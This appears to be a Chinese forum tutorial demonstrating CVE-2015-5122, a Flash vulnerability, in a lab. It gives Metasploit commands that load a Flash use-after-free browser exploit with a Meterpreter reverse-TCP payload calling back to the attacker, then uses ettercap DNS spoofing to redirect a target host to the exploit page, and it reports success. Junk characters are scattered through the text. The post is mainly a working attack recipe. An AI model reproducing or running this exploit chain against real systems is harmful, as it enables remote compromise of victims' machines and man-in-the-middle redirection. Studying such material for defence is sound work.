cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

, V% N1 H" Y4 h% N 二、cve2015-5122漏洞实例演示虚拟机 3 L: a _' J6 R* P

6 _; h; Z/ q; m# e) d& m# n4 Q 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 5 R; J: f2 |5 i% t9 J* [

8 m4 C6 W1 U( W$ x0 s search cve-2015-5122如图： 4 R! d3 L7 E+ u9 |4 B

1 x( Z0 T+ y: j7 e- F7 a 5 C0 R! |0 q, e5 p* |

% [* u$ d8 e5 C b' { 下面我们敲如下命令： & S- G) W6 r" ~7 A# T$ [2 Z6 ~

4 {9 c, M5 r( b2 u2 @. p) y use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 m; W t4 c! W0 {- ~* n

$ H" H8 b/ _* q1 O4 O set PAYLOAD windows/meterpreter/reverse_tcp 1 N ]+ U9 G2 Q: ^0 }7 [

( K% T _8 ^' m$ T% u set LHOST 192.168.0.109 4 W+ j3 Z) C/ A c W+ i2 I

8 `$ }" c/ `9 p: D; m% I set URIPATH / /*根目录*/ ' e: L, V, r+ j* e4 g

6 W/ ]8 [2 f( o8 q" ]% q0 N8 w; } set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 7 w' u/ G. Q% \1 L

& F! L8 F' D+ k5 a7 e. R6 M" k set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' W9 N5 L/ _1 m; q$ W

8 b7 H2 [5 C3 y; F) t 然后show options如图： & n+ [7 H+ M# }

' a, B" `! A+ [ }6 |$ X4 D 2 O; P( a2 ?1 I. o N

& k- @& m7 I7 @/ b1 z# S 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
% o5 u. T0 |; P( X ! n/ D6 k$ F% v

" [! ?3 E6 D7 W$ b! b' }) M 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 2 h4 m6 r% E- v. m$ k

, v, Y/ @0 J7 G" ^9 ~0 B: {5 W Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ! e7 k( ~6 a4 ^- x* T1 R, [

: }/ t+ _3 M2 M) [( a3 k D! i. x; N# Z+ l2 j9 D, t2 N

2 } i& J/ f9 q$ z/ o% z* S 成功了，这时候我们断开ettercap，如图： ! \1 p* J( i1 K7 q

, O. D! h( N0 g* A/ ~3 j- n ) D+ ?0 A9 Y% s- `) c$ r

7 y; S* a( n. o' O7 b; u& p9 \3 t Screenshot如图： 3 U( L' P# `9 B! [7 R2 T( A

4 V! @. C1 M1 N- \9 s1 W) Z/ y : c3 z. F; e# z8 s9 q8 b8 `

9 H7 Y3 B5 K) O# Z* T6 B% I / M- e( ]5 l+ f

		自动登录	找回密码
密码			立即注册